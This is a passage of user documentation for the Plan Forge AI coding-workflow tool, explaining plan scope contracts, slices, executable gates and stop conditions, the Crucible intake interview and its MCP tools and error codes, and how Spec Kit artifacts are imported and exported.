| generic | Any AI tool | AI-ASSISTANT.md, copy-paste guardrails |
See Chapter 13: Multi-Agent Setup for detailed configuration per agent, feature parity matrix, and quorum mode.
When a new Plan Forge version is available, pforge smith will tell you. Update without re-running the full setup:
# Preview what would change
.\pforge.ps1 update --dry-run
# Apply updates
.\pforge.ps1 update
Updates replace framework files (pipeline prompts, shared instructions, hooks) but never touch your customized files (copilot-instructions.md, project principles, plan files, .forge.json).
Where does pforge update pull from?
By default (auto), it picks the newer of a local sibling clone at ../plan-forge and the latest GitHub tag, so a stale master checkout won't drag you onto unreleased -dev bytes. See Appendix G: Update Source Modes for the github-tags and local-sibling options and when to use them.
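The "pick the newer of the two" rule can be sketched as a version comparison. This is only an illustration, not Plan Forge's implementation: parse_version and pick_source are hypothetical names, and the handling of suffixes such as -dev and of ties is an assumption.

```python
def parse_version(tag: str) -> tuple:
    """Turn 'v2.17.0' or '2.18.0-dev' into a sortable tuple."""
    core, _, prerelease = tag.lstrip("v").partition("-")
    numbers = tuple(int(part) for part in core.split("."))
    # Assumption: a pre-release such as -dev sorts before the plain release.
    rank = 0 if prerelease else 1
    return numbers + (rank,)


def pick_source(local_sibling: str, github_tag: str) -> str:
    """Return the source holding the newer version (assumed: ties go to the tag)."""
    if parse_version(local_sibling) > parse_version(github_tag):
        return "local-sibling"
    return "github-tags"


# A sibling clone sitting on an unreleased -dev build loses to the released tag.
print(pick_source("2.18.0-dev", "v2.18.0"))
```

Under these assumptions, a stale or unreleased local checkout never outranks a published tag with the same version numbers.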
📄 Full reference: Multi-Agent Setup, Quick Start on GitHub
Here's what works and here's what breaks.
Every hardened plan has these mandatory sections. The plan-hardener agent adds them automatically during Step 2 (or the Crucible interview adds them upstream during Smelt), but you should understand what each does and how to edit them:
| Section | Required? | Purpose |
|---|---|---|
| Scope Contract | Yes | In-scope paths, out-of-scope, forbidden actions |
| MUST Criteria | Yes | Non-negotiable outcomes (checkboxes) |
| SHOULD Criteria | Optional | Best-effort goals |
| Build / Test Commands | Yes (v2.82.1+) | build-command + test-command, required by the Crucible critical-fields gate |
| Execution Slices | Yes | Checkpointed work chunks with gates and per-slice **Files in scope** |
| Branch Strategy | Recommended | Git branch name and merge approach |
| Rollback Plan | Recommended | How to undo if things go wrong |
Per-slice file lists can be authored as either **Files:** or **Files in scope** (the latter is what the Crucible/hardener now emit). Validation gates can be authored as either **Validation Gate** or **Exit gate**. The orchestrator parses both forms of each. Hand-authored plans should prefer the Files in scope + Exit gate pair to match generated output.
Plans created via the Crucible smelter are now blocked from finalizing until every CRITICAL_FIELD is filled in. This eliminates the entire class of "TBD-laden plans that compile but can't run."
| Field | What it locks down | Example |
|---|---|---|
| build-command | The exact command the orchestrator will run as the build gate per slice | dotnet build |
| test-command | The exact command the orchestrator will run as the test gate | dotnet test |
| scope | In-scope paths (per-slice Files in scope + plan-level scope) | src/services/**, tests/services/** |
| validation-gates | At least one executable gate per slice | dotnet test --filter UserService |
| forbidden-actions | Concrete file patterns or actions that are out-of-bounds | Do NOT modify src/database/migrations/ |
| rollback | How to undo the change cleanly | git revert <commit> or named feature flag |
If any CRITICAL_FIELD is missing, forge_crucible_finalize returns 409 with CRITICAL_FIELDS_MISSING and a criticalGaps[] array pointing at the unresolved fields. The Crucible interview adds a question for each missing field automatically: the feature lane now asks 7 questions (was 6); the tweak lane asks 4 (was 3).
The build/test commands are inferred from your repo when possible (via inferRepoCommands, which checks package.json, *.csproj, pyproject.toml, Cargo.toml, etc.), so most projects don't have to type them by hand.
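The inference idea can be sketched as a lookup from marker files to commands. This is not the actual inferRepoCommands logic: infer_repo_commands is a hypothetical stand-in, and the marker-to-command table contains illustrative guesses only.

```python
import json
import tempfile
from pathlib import Path

# Marker file (glob) -> (build command, test command). Illustrative guesses only.
MARKERS = [
    ("*.csproj", ("dotnet build", "dotnet test")),
    ("Cargo.toml", ("cargo build", "cargo test")),
    ("pyproject.toml", (None, "pytest")),
]


def infer_repo_commands(repo: Path) -> dict:
    """Suggest build/test commands from files found at the repo root."""
    package_json = repo / "package.json"
    if package_json.exists():
        scripts = json.loads(package_json.read_text()).get("scripts", {})
        return {
            "build-command": "npm run build" if "build" in scripts else None,
            "test-command": "npm test" if "test" in scripts else None,
        }
    for pattern, (build, test) in MARKERS:
        if any(repo.glob(pattern)):
            return {"build-command": build, "test-command": test}
    # Nothing recognized: the interview would have to ask the user.
    return {"build-command": None, "test-command": None}


# Demo against a throwaway directory containing a single .csproj file.
with tempfile.TemporaryDirectory() as tmp:
    (Path(tmp) / "App.csproj").write_text("<Project />")
    inferred = infer_repo_commands(Path(tmp))
print(inferred)
```

A None value marks a command that could not be inferred, which is the case where you would type it by hand.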
If you hand-author docs/plans/Phase-NN.md instead of using the Crucible, the gate doesn't apply. You should still fill these fields in: the orchestrator reads build-command and test-command from the plan frontmatter when running gates that don't specify a full command inline.
The scope contract is the most important section. It tells the AI exactly what files it can touch, and what's off-limits.
## Scope Contract
**In Scope**: src/services/UserService.cs, src/repositories/UserRepository.cs,
tests/services/UserServiceTests.cs, tests/repositories/UserRepositoryTests.cs
**Out of Scope**: frontend/**, deployment/**, docs/** (except this plan)
**Forbidden Actions**:
- Do NOT modify src/database/migrations/ (migration is a separate phase)
- Do NOT change AppSettings.json connection strings
- Do NOT add NuGet packages without explicit approval
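A contract this specific can be checked mechanically. The sketch below is one way to do that, assuming the changed-file list comes from somewhere like a diff; check_scope is a hypothetical helper, not a Plan Forge API. It uses Python's fnmatch, where * also matches across path separators.

```python
from fnmatch import fnmatch

# Patterns taken from the contract above.
IN_SCOPE = [
    "src/services/UserService.cs",
    "src/repositories/UserRepository.cs",
    "tests/services/UserServiceTests.cs",
    "tests/repositories/UserRepositoryTests.cs",
]
FORBIDDEN = ["src/database/migrations/*", "AppSettings.json"]


def check_scope(changed_files):
    """Return (path, reason) for every file that violates the contract."""
    violations = []
    for path in changed_files:
        if any(fnmatch(path, pattern) for pattern in FORBIDDEN):
            violations.append((path, "forbidden"))
        elif not any(fnmatch(path, pattern) for pattern in IN_SCOPE):
            violations.append((path, "out of scope"))
    return violations


violations = check_scope([
    "src/services/UserService.cs",
    "src/database/migrations/001_init.sql",
    "frontend/app.ts",
])
print(violations)
```

A contract written as "anything related to users" gives a check like this nothing to match against.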
## Scope Contract
**In Scope**: anything related to users
**Out of Scope**: nothing specific
**Forbidden Actions**: don't break things
"Anything related to users" gives the AI free rein to refactor 20 files. "Don't break things" isn't enforceable. Be specific about paths, and list forbidden actions as concrete file patterns. That's how you get lasagna code, clean layers, each with a purpose, instead of spaghetti where everything touches everything.
Before the rules, a worked example. The same feature (add a User Profile endpoint), planned two ways:
Slice 1, Add User Profile feature [≥90 min, unbounded]
• Database migration
• Repository
• Service
• Controller
• Tests
When the gate fails you have no idea which layer broke, the migration can't roll back cleanly without nuking the service work, and the reviewer is reading a 12-file diff with no checkpoint to anchor against.
Slice 1, Migration + model [30 min]
Slice 2, Repository + unit tests [45 min]
Slice 3, Service + business-logic tests [60 min]
Slice 4, Controller + integration tests [45 min]
Each slice ends at a real checkpoint. A migration failure stops Slice 1 cleanly. A controller bug at Slice 4 doesn't touch the migration in Slice 1. The reviewer reads four small diffs, each scoped to one architectural layer.
Slices are 30–120 minute chunks of work. Each slice should produce a commit-worthy change (the "one PR" rule).
Slice 1, Database migration + model [30 min]
Slice 2, Repository + unit tests [45 min]
Slice 3, Service layer + business logic tests [60 min]
Slice 4, API controller + integration tests [45 min]
Slice 5, Error handling + edge case tests [30 min]
Slice 6, Documentation + cleanup [30 min]
Gates are the quality checkpoints between slices. A gate must be a concrete, executable command, not a human judgment call.
**Gate**:
dotnet build # zero errors
dotnet test --filter "UserProfile" # 6+ tests pass
grep -rn "string interpolation" src/ # zero hits (security)
**Gate**: "tests pass" ← Which tests? How many?
**Gate**: "code looks clean" ← Not executable
**Gate**: "review the changes" ← Human-dependent, blocks automation
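The reason gates must be executable is that a runner can then decide pass or fail from exit codes alone. A minimal sketch, assuming each gate is an argv list and that a non-zero exit code means failure; run_gates is a hypothetical name, and the Python one-liners stand in for commands such as dotnet build.

```python
import subprocess
import sys


def run_gates(commands):
    """Run gate commands in order and stop at the first non-zero exit code."""
    for command in commands:
        result = subprocess.run(command, capture_output=True, text=True)
        if result.returncode != 0:
            return {"passed": False, "failed_gate": command, "exit_code": result.returncode}
    return {"passed": True, "failed_gate": None, "exit_code": 0}


# Stand-in gates: one that succeeds, one that fails, one that must never run.
ok_gate = [sys.executable, "-c", "print('build ok')"]
bad_gate = [sys.executable, "-c", "import sys; sys.exit(3)"]
never_run = [sys.executable, "-c", "raise SystemExit(9)"]

outcome = run_gates([ok_gate, bad_gate, never_run])
print(outcome["passed"], outcome["exit_code"])
```

A gate like "code looks clean" has no exit code, so there is nothing for a runner like this to evaluate.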
Mark slices that can run concurrently with the [P] tag. Add dependency declarations when slices must run in order:
### Slice 1, Database Migration [30 min]
...
### Slice 2, Repository Layer [P] [depends: Slice 1] [scope: src/repos/**]
...
### Slice 3, Service Layer [P] [depends: Slice 1] [scope: src/services/**]
...
### Slice 4, API Controller [depends: Slice 2, Slice 3]
...
Slices 2 and 3 both depend on Slice 1 (the migration) but are independent of each other, so they run in parallel. Slice 4 waits for both to finish. The orchestrator builds a DAG (directed acyclic graph) and schedules accordingly.
Only mark slices [P] when they touch different [scope: ...] paths.
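The scheduling described above can be sketched with Python's standard graphlib module. This only illustrates how dependency declarations become parallel "waves"; it is not the orchestrator's code, and schedule_waves is a hypothetical name.

```python
from graphlib import TopologicalSorter

# Each slice maps to the set of slices it depends on (from the example above).
depends = {
    "Slice 1": set(),
    "Slice 2": {"Slice 1"},
    "Slice 3": {"Slice 1"},
    "Slice 4": {"Slice 2", "Slice 3"},
}


def schedule_waves(graph):
    """Group slices into waves; slices in the same wave can run concurrently."""
    sorter = TopologicalSorter(graph)
    sorter.prepare()  # raises graphlib.CycleError if the graph is not a DAG
    waves = []
    while sorter.is_active():
        ready = sorted(sorter.get_ready())
        waves.append(ready)
        sorter.done(*ready)
    return waves


waves = schedule_waves(depends)
print(waves)
```

Slices 2 and 3 land in the same wave, and Slice 4 only becomes ready once both are marked done.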
Stop conditions tell the AI when to halt instead of trying to work around a failure:
**Stop if**: Build fails with compilation error
**Stop if**: Any existing test regresses (not just new tests)
**Stop if**: Migration produces data loss warning
**Stop if**: Security scan finds HIGH or CRITICAL vulnerability
Without stop conditions, the AI may try to "fix" a build failure by removing code, or skip a failing test by commenting it out. Stop conditions force it to report the problem instead of hiding it.
Each slice can list which instruction files are relevant. Don't load all 18; load only what's needed:
### Slice 1, Database Migration
**Context**: database.instructions.md, security.instructions.md
### Slice 4, API Controller
**Context**: api-patterns.instructions.md, auth.instructions.md, errorhandling.instructions.md
This keeps the AI's context window focused. A database slice doesn't need caching instructions; a controller slice doesn't need migration patterns.
| Mistake | What Happens | Fix |
|---|---|---|
| Scope too loose | AI refactors 20 files instead of 3 | List specific file paths, not categories |
| Scope too tight | AI can't create necessary helper files | Include reasonable wildcards: src/services/** |
| No stop conditions | AI works around failures silently | Add "Stop if" to every slice |
| Vague gates | Gate "passes" without actually validating | Use executable commands with expected counts |
| Tests in last slice | 5 slices of code, then discover it's untestable | Include tests alongside each code slice |
| Giant slices | 120+ min of work before first checkpoint | Break into 30–60 min focused chunks |
| Missing rollback | Panic when something breaks in production | Add rollback plan with specific git revert commands |
Eight language-specific plan examples ship with Plan Forge. Use them as starting points:
| Stack | File | Features Demonstrated |
|---|---|---|
| .NET | Phase-DOTNET-EXAMPLE.md | RLS, Dapper, Blazor, GraphQL, 12 slices |
| TypeScript | Phase-TYPESCRIPT-EXAMPLE.md | Express, Prisma, Vitest |
| Python | Phase-PYTHON-EXAMPLE.md | FastAPI, SQLAlchemy, Pytest |
| Java | Phase-JAVA-EXAMPLE.md | Spring Boot, JPA, JUnit |
| Go | Phase-GO-EXAMPLE.md | Chi router, sqlx, testing |
| Swift | Phase-SWIFT-EXAMPLE.md | Vapor, Fluent, XCTest |
| Rust | Phase-RUST-EXAMPLE.md | Axum, sqlx, Cargo test |
| PHP | Phase-PHP-EXAMPLE.md | Laravel, Eloquent, PHPUnit |
All examples live in docs/plans/examples/.
For a Design Patterns-style catalog of 25+ plan archetypes (database migrations, refactors, multi-service rollouts, bug sweeps, and more, each with a skeleton template), see Appendix Y: Plan Pattern Library.
📄 Full reference: AI-Plan-Hardening-Runbook.md on GitHub
The Crucible is the intake interview for Plan Forge. You bring a rough idea ("add user profile editing") and the smelter walks you through 4–12 questions, then writes out a complete Phase plan that's ready for the Forge to execute.
The Crucible has three sizes, called lanes (tweak, feature, and full), that scale the interview to the size of the change.
You can pick a lane explicitly, or let Crucible infer one from your raw idea (it looks for keywords like "bump" or "refactor subsystem"). When the interview ends, Crucible writes docs/plans/Phase-NN.md and hands it off to the Plan Hardener (Step 2 of the pipeline).
The Plan Hardener (Step 2) assumes you already know what you want to build. Crucible exists because most of the time you don't, at least not precisely enough for a hardened plan. The smelter enforces three things:
- No placeholder TBDs: a smelt cannot finalize until every critical field is filled in.
- Every finalized plan carries crucibleId, lane, and source in its frontmatter so downstream gates can audit how it got here.
- Every plan under docs/plans/Phase-*.md must carry a crucibleId. Plans get one in one of three ways: by finishing a smelt, by using --manual-import for hand-authored or Spec Kit imports, or by the grandfather migration that runs once when you first upgrade. Plans without a crucibleId are rejected at run time.
Crucible scales its interview to the size of the change. Pick (or let the server infer) one of:
tweak: Version bumps, config flag flips, doc edits, small bug fixes. Inferred when the raw idea mentions "bump", "fix typo", "update dep". Includes a forbidden-actions question so even tiny changes declare what they won't touch.
feature: Default lane. New endpoint, new tool, new UI section, new service with a handful of slices.
full: Architectural shifts, subsystem introductions, anything that touches three or more top-level modules.
Crucible streams one question at a time. You answer, it writes the answer to the smelt's JSONL record, then it computes the next question. Six MCP tools drive the loop:
forge_crucible_submit   { rawIdea, lane?, source? } → { id, firstQuestion }
forge_crucible_ask      { id, answer, questionId? } → { nextQuestion | done: true }
forge_crucible_preview  { id }                      → { draft, criticalGaps[] }
forge_crucible_finalize { id, overwrite? }          → { phaseName, planPath, hardenerHandoff }
forge_crucible_list     { status? }                 → [ smelts … ]
forge_crucible_abandon  { id, reason? }             → { ok }
Optional questionId on ask: pass the question id you're answering. If it doesn't match the server's pending question id, the call returns 409 with ASK_QUESTION_MISMATCH and an { expected, got } payload. Multi-turn LLM clients that fall out of sync get a loud failure instead of silent answer corruption.
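The questionId guard can be illustrated with an in-memory stand-in for one smelt. SmeltSession is hypothetical and only mimics the behavior described above: a mismatched id is rejected with an { expected, got } payload and nothing is recorded.

```python
class SmeltSession:
    """In-memory stand-in for one smelt's interview state (hypothetical)."""

    def __init__(self, question_ids):
        self.pending = list(question_ids)
        self.answers = {}

    def ask(self, answer, question_id=None):
        if not self.pending:
            return {"done": True}
        expected = self.pending[0]
        if question_id is not None and question_id != expected:
            # Loud failure: the answer is NOT stored against the wrong question.
            return {"status": 409, "code": "ASK_QUESTION_MISMATCH",
                    "expected": expected, "got": question_id}
        self.answers[expected] = answer
        self.pending.pop(0)
        if self.pending:
            return {"nextQuestion": self.pending[0]}
        return {"done": True}


session = SmeltSession(["scope", "build-command"])
# A client that lost sync answers the wrong question first.
mismatch = session.ask("dotnet build", question_id="build-command")
in_order = session.ask("src/services/**", question_id="scope")
finished = session.ask("dotnet build", question_id="build-command")
print(mismatch["code"], in_order, finished)
```

Without the id check, the first call would have stored "dotnet build" as the scope answer.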
Build/test command inference: when the build-command or test-command questions come up, the interview pre-fills suggestions via inferRepoCommands, which inspects package.json scripts, *.csproj, pyproject.toml, Cargo.toml, go.mod, etc. You usually just confirm.
Finalize writes docs/plans/<phaseName>.md with the answer-derived draft and emits crucible-handoff-to-hardener on the hub so the dashboard (and downstream agents) can pick up the plan for Step 2.
Crucible refuses to finalize a smelt with placeholder TBDs. The gate checks six fields; any unresolved field is a hard block:
| Field | Lane(s) | What it locks down |
|---|---|---|
| build-command | all | Exact build command the orchestrator runs as a per-slice gate. Inferred from repo if possible. |
| test-command | all | Exact test command. Inferred from repo if possible. |
| scope | all | Plan-level + per-slice Files in scope |
| validation-gates | feature, full | At least one executable gate per slice |
| forbidden-actions | tweak (4), feature (7) | Concrete file patterns or named actions that are out-of-bounds |
| rollback | feature, full | How to undo the change cleanly |
If any field is missing, forge_crucible_finalize returns:
- MCP tool: { ok: false, code: "CRITICAL_FIELDS_MISSING", criticalGaps: [{ field, reason, hint }, …] }
- REST API: 409 Conflict with { criticalGaps[], unresolvedFields[], hint: "call /api/crucible/preview" }
The preview tool returns the same criticalGaps[] structure without trying to write a plan, so LLM agents can self-correct.
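The shape of that response can be sketched as a check over a draft's fields. This is a simplified illustration, not the server's gate: check_critical_fields is a hypothetical name, the placeholder list is an assumption, and the per-lane differences from the table above are ignored.

```python
CRITICAL_FIELDS = [
    "build-command", "test-command", "scope",
    "validation-gates", "forbidden-actions", "rollback",
]
# Assumption: these values count as "not filled in".
PLACEHOLDERS = {"", "tbd", "todo"}


def check_critical_fields(draft):
    """Return a finalize-style result listing every unresolved field."""
    gaps = []
    for field in CRITICAL_FIELDS:
        value = str(draft.get(field) or "").strip()
        if value.lower() in PLACEHOLDERS:
            gaps.append({
                "field": field,
                "reason": "missing or placeholder",
                "hint": f"answer the {field} question",
            })
    if gaps:
        return {"ok": False, "code": "CRITICAL_FIELDS_MISSING", "criticalGaps": gaps}
    return {"ok": True}


draft = {
    "build-command": "dotnet build",
    "test-command": "dotnet test",
    "scope": "src/services/**",
    "validation-gates": "dotnet test --filter UserService",
    "rollback": "TBD",
}
result = check_critical_fields(draft)
print([gap["field"] for gap in result["criticalGaps"]])
```

An agent can read the field names out of criticalGaps and answer exactly those questions before retrying.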
If docs/plans/<phaseName>.md already exists and is non-empty, finalize refuses to overwrite a hand-authored plan:
- <phaseName>.crucible-draft.md is written so the smelt's draft is preserved.
- MCP tool: returns { ok: false, code: "PLAN_ALREADY_EXISTS", phaseName, planPath, draftPath }.
- REST API: returns 409 Conflict with the same payload.
- Pass overwrite: true on either surface to bypass; the previous plan moves to <phaseName>.replaced-<timestamp>.md.
A smelt can spawn a child smelt, which is useful when answering a question reveals a sub-feature that needs its own phase. The server enforces a maximum recursion depth (default 1, configurable up to 3) so a runaway agent cannot chain smelts indefinitely.
Child smelts inherit parentSmeltId and appear linked in the dashboard. The parent can reference the child's crucibleId in its frontmatter so the audit chain stays intact.
The crucible-enforce gate refuses to accept any plan under docs/plans/Phase-*.md without a crucibleId. There are exactly three legitimate ways to satisfy it:
- Finish a smelt. The finalized plan carries its crucibleId in the frontmatter.
- Grandfather migration. Runs once when you first upgrade; each existing plan gets crucibleId: grandfathered-<uuid> and a row in .forge/crucible/manual-imports.jsonl.
- Manual import. pforge run-plan --manual-import path/to/plan.md stamps a synthetic imported-<source>-<uuid> id and logs the bypass. Reserved for Spec Kit imports, offline drafts, and genuine emergencies.
Spec Kit users import external specs regularly. Crucible treats those imports as a first-class path:
pforge run-plan --manual-import docs/plans/imported/Phase-from-speckit.md \
--source speckit \
--reason "Imported from Spec Kit session 2026-04-15"
The gate writes frontmatter with source: speckit and appends an audit row. The Spec Kit importer does not require a full interview; it trusts that the external spec already carried equivalent structure.
Two tabs expose Crucible's state:
- One tab is a read-only view of docs/plans/PROJECT-PRINCIPLES.md, .github/instructions/project-profile.instructions.md, and .github/instructions/project-principles.instructions.md, plus the full manual-import audit log. Edits happen in your editor; this tab is intentionally non-editable.
The Config tab's Crucible section persists to .forge/crucible/config.json. All writes go through a sanitizer that drops unknown fields and snaps numbers to safe bounds, so no UI bug can corrupt the file.
| Field | Range | Default | What it does |
|---|---|---|---|
| defaultLane | tweak / feature / full | feature | Lane used when forge_crucible_submit is called without one. |
| recursionDepth | 0–3 | 1 | Max child-smelt depth before the server refuses to spawn another. |
| autoApproveAgent | boolean | false | When true, smelts with source: agent auto-finalize after the interview completes. Use with care. |
| sourceWeights | sum 100 | 34/33/33 | Weighting for how Memory / Principles / Plans contribute to default answers in the interview. Server normalizes any sum to 100. |
| staleDefaultsHours | 1–168 | 24 | If your Principles or profile file is newer than the smelt by this many hours, the interview flags a STALE_PRINCIPLES / STALE_PROFILE warning so you re-read before finalizing. |
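The sanitizer behavior (drop unknown fields, snap numbers to bounds, normalize weights to 100) can be sketched as follows. The ranges and defaults come from the table above; sanitize, clamp, and normalize_weights are hypothetical names, representing sourceWeights as a three-item list is an assumption, and the real sanitizer may differ in detail.

```python
DEFAULTS = {
    "defaultLane": "feature",
    "recursionDepth": 1,
    "autoApproveAgent": False,
    "sourceWeights": [34, 33, 33],  # assumed order: Memory, Principles, Plans
    "staleDefaultsHours": 24,
}
LANES = ("tweak", "feature", "full")


def is_number(value):
    return isinstance(value, (int, float)) and not isinstance(value, bool)


def clamp(value, low, high, fallback):
    """Snap a number into [low, high]; fall back when it is not a number."""
    if not is_number(value):
        return fallback
    return max(low, min(high, int(value)))


def normalize_weights(weights):
    """Rescale three non-negative weights so they sum to exactly 100."""
    valid = (isinstance(weights, list) and len(weights) == 3
             and all(is_number(w) and w >= 0 for w in weights)
             and sum(weights) > 0)
    if not valid:
        return list(DEFAULTS["sourceWeights"])
    total = sum(weights)
    scaled = [round(w * 100 / total) for w in weights]
    scaled[0] += 100 - sum(scaled)  # absorb rounding drift in the first slot
    return scaled


def sanitize(raw):
    """Build a clean config from known fields only; unknown keys are dropped."""
    clean = dict(DEFAULTS)
    if raw.get("defaultLane") in LANES:
        clean["defaultLane"] = raw["defaultLane"]
    clean["recursionDepth"] = clamp(raw.get("recursionDepth"), 0, 3, 1)
    if isinstance(raw.get("autoApproveAgent"), bool):
        clean["autoApproveAgent"] = raw["autoApproveAgent"]
    clean["sourceWeights"] = normalize_weights(raw.get("sourceWeights"))
    clean["staleDefaultsHours"] = clamp(raw.get("staleDefaultsHours"), 1, 168, 24)
    return clean


cleaned = sanitize({"defaultLane": "huge", "recursionDepth": 9,
                    "staleDefaultsHours": 0, "sourceWeights": [1, 1, 2],
                    "rogue": True})
print(cleaned)
```

Because the result is always rebuilt from known fields, a malformed payload can at worst reset a value to its default.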
- Plan rejected for a missing crucibleId: run a smelt, or use --manual-import with a --reason.
- CRITICAL_FIELDS_MISSING: call forge_crucible_preview to see criticalGaps[] with { field, reason, hint } for each missing answer. The interview will queue a question for each gap when you call ask next.
- PLAN_ALREADY_EXISTS: review the existing plan at planPath and the smelt's draft at draftPath before deciding. If you genuinely want to replace the existing plan, call finalize again with overwrite: true; the original moves to <phaseName>.replaced-<timestamp>.md.
- ASK_QUESTION_MISMATCH: the call passed a questionId that doesn't match the server's pending question. Re-fetch state via forge_crucible_preview (returns the active question) and retry. Common when two LLM clients drive the same smelt out of order.
- STALE_PRINCIPLES / STALE_PROFILE: re-read the flagged file before finalizing, or adjust staleDefaultsHours in Config.
- Child smelt refused at the depth limit: raise recursionDepth in Config. Three is the hard ceiling; beyond that, extract a separate Phase.
- No docs/plans/PROJECT-PRINCIPLES.md yet: run /project-principles in Copilot chat, or create the file manually.
Crucible's downstream surfaces have grown beyond the original chapter. None of these change the core interview → plan → hardener flow above; they extend it with feedback loops the rest of the system uses:
- The forge_tempering_drain round-loop (Ch 21 Audit Loop) re-probes a plan's gates until convergence, surfacing residual Crucible STALE_PRINCIPLES warnings as actionable findings rather than transient noise.
- forge_patterns_list's detectors can spot Crucible-stage anti-patterns alongside execution-stage ones.
(forge_crucible_* tool surface)
Plan Forge's native import path for Spec Kit artifacts: map spec.md, plan.md, tasks.md, and constitution.md directly into a Crucible smelt with zero re-specifying.
Spec Kit is an alternative entry path into Crucible. Read this chapter if your organization already writes formal specifications and you'd rather import them than answer the interactive interview. If you don't use Spec Kit, you can safely skip the whole chapter; nothing else in the manual depends on it.
When the Crucible intake scanner detects Spec Kit artifacts in your project, it offers to auto-import them rather than run the full interactive interview. The import flow maps four source files into Crucible's required schema in a single pass:
The diagram above shows the full mapping surface. Source fields on the left feed into the field mapper (center), which outputs a populated Crucible smelt (right). PROJECT-PRINCIPLES.md, if present, is applied as a policy overlay: tech-stack constraints and forbidden patterns are enforced pre-smelt so they don't need to be re-entered during hardening.
| File | Origin | What it provides |
|---|---|---|
| spec.md | /speckit.specify | Feature title, goals array, out-of-scope boundaries, acceptance criteria. Maps to plan-title and objectives[] in the smelt. |
| plan.md | /speckit.plan | Scope definition, slice list, and forbidden-actions table. Maps directly to scope, slices[], and forbidden-actions. |
| tasks.md | /speckit.tasks | Per-slice task breakdown with task-id, owner, and status fields. Maps to slice.tasks[] and slice.status inside each slice entry. |
| constitution.md | /speckit.constitution | Agent rules, commitments, and prohibitions. Imports as agent-constraints in the smelt, directly equivalent to Plan Forge's PROJECT-PRINCIPLES.md. |
Representative mapping from source to smelt schema:
| Source field | Crucible field | Notes |
|---|---|---|
| spec.md → title | plan-title | Required. Import blocked if absent. |
| spec.md → goals[] | objectives[] | Array preserved as-is. |
| plan.md → scope | scope | Required. Import blocked if absent. |
| plan.md → slices[] | slices[] | Each slice entry carries its own task list. |
| plan.md → forbidden-actions | forbidden-actions | Merged with any rules derived from constitution.md. |
| tasks.md → task-id | slice.tasks[] | Keyed to matching slice by position. |
| tasks.md → status | slice.status | Carries prior execution state into the smelt. |
| constitution.md → rules | agent-constraints | Enforced by the hardener during Step 2. |
| PROJECT-PRINCIPLES.md | policy-overlay | Applied pre-smelt as non-negotiable constraint layer. |
If spec.md lacks a title, or plan.md lacks a scope section, the importer halts with a SPECKIT_IMPORT_MISSING_FIELD error and reports which field is absent. No partial imports are written. Fix the source artifact and re-run.
There are three ways to trigger the Spec Kit import: via the Crucible CLI, via the MCP tool, or via pforge run-plan auto-detection.
The most explicit path. Run the import command from the project root where the Spec Kit artifacts live:
# Import from default Spec Kit artifact locations
pforge crucible import --from=spec-kit
# Import from a non-default directory
pforge crucible import --from=spec-kit --dir=specs/my-feature
# Dry run: validate the mapping without writing a smelt
pforge crucible import --from=spec-kit --dry-run
The importer scans for spec.md, plan.md, tasks.md, and constitution.md in the specified directory (defaults to the repo root and common sub-paths: specs/, memory/, .speckit/). It reports which files were found, which fields mapped cleanly, and which fields were absent or required manual resolution.
From any MCP client (Copilot Chat, Claude Code, Cursor):
forge_crucible_import({
source: "spec-kit",
dir: "specs/my-feature", // optional, defaults to repo root scan
dryRun: false
})
Returns a structured result: { ok, smeltId, mappedFields[], missingFields[], warnings[] }. If ok is false, the missingFields array tells you exactly what to fix.
pforge run-plan
When you run a plan that was generated from a Crucible smelt, the orchestrator checks whether the smelt originated from a Spec Kit import. If so, LiveGuard's PostSlice hook automatically compares each completed slice against the original spec.md acceptance criteria, providing drift detection that goes back to the original specification, not just the hardened plan.
pforge run-plan docs/plans/my-feature-PLAN.md
No extra flags needed. The Spec Kit provenance is embedded in the smelt metadata at import time.
1. Run /speckit.specify, /speckit.plan, /speckit.tasks, and /speckit.constitution in your Spec Kit-enabled IDE. This produces spec.md, plan.md, tasks.md, and constitution.md.
2. Run pforge crucible import --from=spec-kit. Confirm the field mapping report looks correct.
3. Review the smelt with pforge crucible status. Adjust any field overrides before hardening.
4. Run the /step2-harden-plan prompt in Copilot Chat, or invoke forge_crucible_harden from any MCP client. This produces the execution-ready plan file with validation gates.
5. Run pforge run-plan docs/plans/my-feature-PLAN.md. Spec Kit provenance in the smelt metadata activates LiveGuard drift checks against spec.md criteria throughout the run.
| Warning / error | Cause | Fix |
|---|---|---|
| SPECKIT_IMPORT_MISSING_FIELD | A required field (title, scope) is absent from its source file. | Edit the Spec Kit artifact and re-run the import. Use --dry-run to verify before committing. |
| SPECKIT_IMPORT_AMBIGUOUS_SLICE | A tasks.md task references a slice name that doesn't exist in plan.md. | Ensure slice names match exactly. Case-sensitive. Re-run /speckit.tasks if tasks were generated before the final plan. |
| SPECKIT_IMPORT_POLICY_CONFLICT | PROJECT-PRINCIPLES.md forbids a pattern that constitution.md or plan.md permits. | PROJECT-PRINCIPLES.md wins because it is the non-negotiable layer. Update the Spec Kit artifact to align with your project principles, or remove the conflicting rule from constitution.md. |
| tasks.md → status import skipped | The Spec Kit tasks.md uses a status vocabulary Plan Forge doesn't recognize (e.g. in-review). | The importer maps done → done, in-progress → in_progress, and everything else → pending. Status values in the smelt can be manually adjusted before hardening. |
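The status mapping in the last row is small enough to write out. This sketch assumes statuses arrive as plain strings; map_status is a hypothetical name, and trimming whitespace and ignoring case are assumptions not stated above.

```python
# Known Spec Kit statuses and their smelt equivalents (from the table above).
STATUS_MAP = {"done": "done", "in-progress": "in_progress"}


def map_status(speckit_status: str) -> str:
    """Map a tasks.md status to a smelt status; unknown values become pending."""
    return STATUS_MAP.get(speckit_status.strip().lower(), "pending")


for status in ["done", "in-progress", "in-review"]:
    print(status, "->", map_status(status))
```

An unrecognized value such as in-review is not an error; it lands as pending and can be adjusted in the smelt before hardening.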
The Spec Kit interop surface is part of Plan Forge's broader ecosystem integration layer. Beyond the four core import files, several extension points allow deeper interop between the two tools.
Spec Kit's 40+ community extensions generate additional artifact types that Plan Forge can consume. When an extension produces a structured markdown artifact with a known schema, the Crucible importer attempts to map it. Currently supported extension artifact types:
| Extension artifact | Plan Forge mapping |
|---|---|
| Security spec (from security-focused speckit extensions) | Mapped to security-constraints in the smelt; activates security.instructions.md auto-loading |
| Database schema spec | Mapped to the database-schema smelt field; activates database.instructions.md |
| API contract spec | Mapped to api-contract; activates api-patterns.instructions.md |
| Test plan spec | Mapped to test-strategy; activates testing.instructions.md |
Extensions that produce non-standard artifact shapes are queued in the smelt's unresolved section for manual review; no extension output is silently dropped.
The flow isn't one-directional. Plan Forge can export a completed plan back to Spec Kit format for teams that want to archive specs alongside the implementation:
# Export the hardened plan as Spec Kit artifacts
pforge crucible export --to=spec-kit docs/plans/my-feature-PLAN.md
